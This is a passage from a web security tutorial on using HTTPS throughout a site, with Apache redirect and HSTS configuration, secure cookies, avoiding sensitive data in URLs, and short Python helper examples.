It is not uncommon to encounter a website where HTTPS is used to protect only some of the resources it serves. In some cases the protection might only be extended to handling form submissions that are considered sensitive. Other times, it might only be used for resources that are considered sensitive, for example what a user might access after logging into the site. Occasionally you might even come across a security article published on a site whose server team hasn’t had time to update their configuration yet – but they will soon, we promise!

The trouble with this inconsistent approach is that anything that isn’t served over HTTPS remains susceptible to the kinds of risks that were outlined earlier. For example, an attacker doing a man-in-the-middle attack could simply alter the form mentioned above to submit sensitive data over plaintext HTTP instead. If the attacker injects executable code that will be executed in the context of our site, it isn’t going to matter much that part of it is protected with HTTPS. The only way to prevent those risks is to use HTTPS for everything.

The solution isn’t quite as clear-cut as flipping a switch and serving all resources over HTTPS. Web browsers default to using HTTP when a user enters an address into their address bar without typing “https://” explicitly. As a result, simply shutting down the HTTP network port is rarely an option. Websites instead conventionally redirect requests received over HTTP to use HTTPS, which is perhaps not an ideal solution, but often the best one available.

For resources that will be accessed by web browsers, adopting a policy of redirecting all HTTP requests to those resources is the first step towards using HTTPS consistently. For example, in Apache redirecting all requests to a path (in the example, /content and anything beneath it) can be enabled with a few simple lines:

# Redirect requests to /content to use HTTPS (mod_rewrite is required)

RewriteEngine On

RewriteCond %{HTTPS} !=on [NC]

RewriteCond %{REQUEST_URI} ^/content(/.*)?

RewriteRule ^ https://%{SERVER_NAME}%{REQUEST_URI} [R,L]
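For readers who handle redirects in application code rather than in the web server, the same decision can be sketched in a few lines of Python. This is an illustrative approximation of the intent of the rules above, not a translation of mod_rewrite's behavior; the function name and its parameters are hypothetical.

```python
from typing import Optional


def https_redirect_target(scheme: str, host: str, path: str,
                          prefix: str = "/content") -> Optional[str]:
    """Return the HTTPS URL to redirect to, or None if no redirect is needed."""
    # Requests that already arrived over HTTPS are left alone.
    if scheme.lower() == "https":
        return None
    # Redirect the protected path itself and anything beneath it.
    if path == prefix or path.startswith(prefix + "/"):
        return f"https://{host}{path}"
    return None


print(https_redirect_target("http", "example.com", "/content/page"))
print(https_redirect_target("https", "example.com", "/content/page"))
```

The first call yields an HTTPS URL for the same host and path, while the second returns `None` because the request is already secure.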

If your site also serves APIs over HTTP, moving to using HTTPS can require a more measured approach. Not all API clients are able to handle redirects. In this situation it is advisable to work with consumers of the API to switch to using HTTPS and to plan a cutoff date, then begin responding to HTTP requests with an error after the date is reached.
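The cutoff approach can be sketched as a small decision function. Everything here is an assumption made for illustration: the function name, the use of a calendar date as the cutoff, and the choice of 403 as the error status returned to plain HTTP clients once the date is reached.

```python
from datetime import date


def api_status_for_request(scheme: str, today: date, cutoff: date) -> int:
    """Decide the HTTP status for an API request during an HTTPS migration."""
    # HTTPS requests are always served normally.
    if scheme.lower() == "https":
        return 200
    # Plain HTTP is rejected with an error once the cutoff date is reached.
    # 403 is an arbitrary choice for this sketch; pick what suits your API.
    if today >= cutoff:
        return 403
    # Before the cutoff, plain HTTP is still tolerated while clients migrate.
    return 200


cutoff = date(2030, 1, 1)  # hypothetical cutoff agreed with API consumers
print(api_status_for_request("http", date(2029, 12, 31), cutoff))
print(api_status_for_request("http", date(2030, 1, 1), cutoff))
```

Returning an error rather than a redirect makes the failure obvious to clients that have not migrated, instead of leaving them to silently mishandle a redirect.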

Use HSTS

Redirecting users from HTTP to HTTPS presents the same risks as any other request sent over ordinary HTTP. To help address this challenge, modern browsers support a powerful security feature called HSTS (HTTP Strict Transport Security), which allows a website to request that a browser only interact with it over HTTPS. It was first proposed in 2009 in response to Moxie Marlinspike’s famous SSL stripping attacks, which demonstrated the dangers of serving content over HTTP. Enabling it is as simple as sending a header in a response:

Strict-Transport-Security: max-age=15768000

The above header instructs the browser to only interact with the site using HTTPS for a period of six months (specified in seconds). HSTS is an important feature to enable due to the strict policy it enforces. Once enabled, the browser will automatically convert any insecure HTTP requests to use HTTPS instead, even if a mistake is made or the user explicitly types “http://” into their address bar. It also instructs the browser to disallow the user from bypassing the warning it displays if an invalid certificate is encountered when loading the site.

In addition to requiring little effort to enable in the browser, enabling HSTS on the server side can require as little as a single line of configuration. For example, in Apache it is enabled by adding a Header directive within the VirtualHost configuration for port 443:

<VirtualHost *:443>

...

# HSTS (mod_headers is required) (15768000 seconds = 6 months)

Header always set Strict-Transport-Security "max-age=15768000"

</VirtualHost>
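If the header is set by application code instead of the web server, the value can be derived from a duration rather than hard-coded. The sketch below is a minimal Python example; the helper name `hsts_header_value` is hypothetical, and it only produces the `max-age` directive shown above.

```python
from datetime import timedelta


def hsts_header_value(max_age: timedelta) -> str:
    """Format the value of a Strict-Transport-Security header."""
    # The max-age directive is expressed in whole seconds.
    return f"max-age={int(max_age.total_seconds())}"


# Six months, taken as half of a 365-day year, matches the value used above.
print(hsts_header_value(timedelta(days=182.5)))  # max-age=15768000
```

Starting with a short duration and lengthening it once HTTPS is known to work everywhere is a cautious way to roll the policy out.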

Now that you have an understanding of some of the risks inherent to ordinary HTTP, you might be scratching your head wondering what happens when the first request to a website is made over HTTP before HSTS can be enabled. To address this risk some browsers allow websites to be added to an “HSTS Preload List” that is included with the browsers. Once included in this list it will no longer be possible for the website to be accessed using HTTP, even the first time a browser interacts with the site.

Before deciding to enable HSTS, some potential challenges must first be considered. Most browsers will refuse to load HTTP content referenced from an HTTPS resource, so it is important to update existing resources and verify all resources can be accessed using HTTPS. We don’t always have control over how content can be loaded from external systems, for example from an ad network. This might require us to work with the owner of the external system to adopt HTTPS, or it might even involve temporarily setting up a proxy to serve the external content to our users over HTTPS until the external systems are updated.

Once HSTS is enabled, it cannot be disabled until the period specified in the header elapses. It is advisable to make sure HTTPS is working for all content before enabling it for your site. Removing a domain from the HSTS Preload List will take even longer. The decision to add your website to the Preload List is not one that should be taken lightly.

Unfortunately, not all browsers in use today support HSTS. It cannot yet be counted on as a guaranteed way to enforce a strict policy for all users, so it is important to continue to redirect users from HTTP to HTTPS and employ the other protections mentioned in this article. For details on browser support for HSTS, you can visit Can I use.

Protect Cookies

Browsers have a built-in security feature to help avoid disclosure of a cookie containing sensitive information. Setting the “secure” flag in a cookie will instruct a browser to only send a cookie when using HTTPS. This is an important safeguard to make use of even when HSTS is enabled.
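As an illustration, the flag can be set with Python's standard `http.cookies` module. The cookie name and value below are placeholders, and the helper `secure_session_cookie` is a hypothetical name used only for this sketch.

```python
from http.cookies import SimpleCookie


def secure_session_cookie(name: str, value: str) -> str:
    """Return a Set-Cookie header value with the secure flag set."""
    cookie = SimpleCookie()
    cookie[name] = value
    # The secure flag tells the browser to send this cookie only over HTTPS.
    cookie[name]["secure"] = True
    return cookie[name].OutputString()


print(secure_session_cookie("session", "abc123"))
```

Most web frameworks expose an equivalent setting, so in practice this is usually a matter of turning on a configuration option rather than building the header by hand.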

Other Risks

There are some other risks to be mindful of that can result in accidental disclosure of sensitive information despite using HTTPS.

It is dangerous to put sensitive data inside of a URL. Doing so presents a risk if the URL is cached in browser history, not to mention if it is recorded in logs on the server side. In addition, if the resource at the URL contains a link to an external site and the user clicks through, the sensitive data will be disclosed in the Referer header.
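One way to catch this kind of leak early is to check URLs for parameters that should never appear in a query string. The sketch below uses Python's standard `urllib.parse`; the list of parameter names is purely hypothetical and would need to reflect what counts as sensitive in your own application.

```python
from urllib.parse import parse_qsl, urlsplit

# Hypothetical parameter names treated as sensitive in this sketch.
SENSITIVE_PARAMS = {"password", "token", "ssn"}


def sensitive_params_in_url(url: str) -> list:
    """Return the sorted names of sensitive query parameters found in a URL."""
    query = urlsplit(url).query
    names = {name.lower() for name, _ in parse_qsl(query, keep_blank_values=True)}
    return sorted(names & SENSITIVE_PARAMS)


print(sensitive_params_in_url("https://example.com/reset?token=abc&page=2"))
print(sensitive_params_in_url("https://example.com/articles?page=2"))
```

A check like this could run in tests or code review tooling to flag routes that accept sensitive values in the URL instead of in a request body.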

In addition, sensitive data might still be cached in the client, or by intermediate proxies if the client’s browser is configured to use them and allow them to inspect HTTPS traffic. For ordinary users the contents of traffic will not be visible to a proxy, but a practice we’ve seen often for enterprises is to install a custom CA on their employees’ systems so their threat mitigation and compliance systems can monitor traffic. Consider using headers to disable caching to reduce the risk of leaking data due to caching.
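A minimal sketch of such headers in Python follows. The specific values are an assumption on our part: `Cache-Control: no-store` asks caches not to keep a copy of the response, and `Pragma: no-cache` is included for older HTTP/1.0 caches. The helper name is hypothetical.

```python
def with_no_cache_headers(headers: dict) -> dict:
    """Return a copy of the response headers with caching disabled."""
    updated = dict(headers)
    # Ask browsers and intermediaries not to store the response at all.
    updated["Cache-Control"] = "no-store"
    # Legacy directive understood by HTTP/1.0 caches.
    updated["Pragma"] = "no-cache"
    return updated


response_headers = with_no_cache_headers({"Content-Type": "text/html"})
print(response_headers["Cache-Control"])
```

Applying these headers only to responses that carry sensitive data keeps the performance benefits of caching for everything else.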

For a general list of best practices, the OWASP Transport Layer Protection Cheat Sheet contains some valuable tips.

Verify Your Configuration

As a last step, you should verify your configuration. There is a helpful online tool for that, too. You can visit SSL Labs’ SSL Server Test to perform a deep analysis of your configuration and verify that nothing is misconfigured. Since the tool is updated as new attacks are discovered and protocol updates are made, it is a good idea to run this every few months.

In Summary

- Use HTTPS for everything!

- Use HSTS to enforce it

- You will need a certificate from a trusted certificate authority if you want your site to be trusted by normal web browsers

- Protect your private key

- Use a configuration tool to help adopt a secure HTTPS configuration

- Set the “secure” flag in cookies

- Be mindful not to leak sensitive data in URLs

- Verify your server configuration after enabling HTTPS and every few months thereafter

from:http://martinfowler.com/articles/web-security-basics.html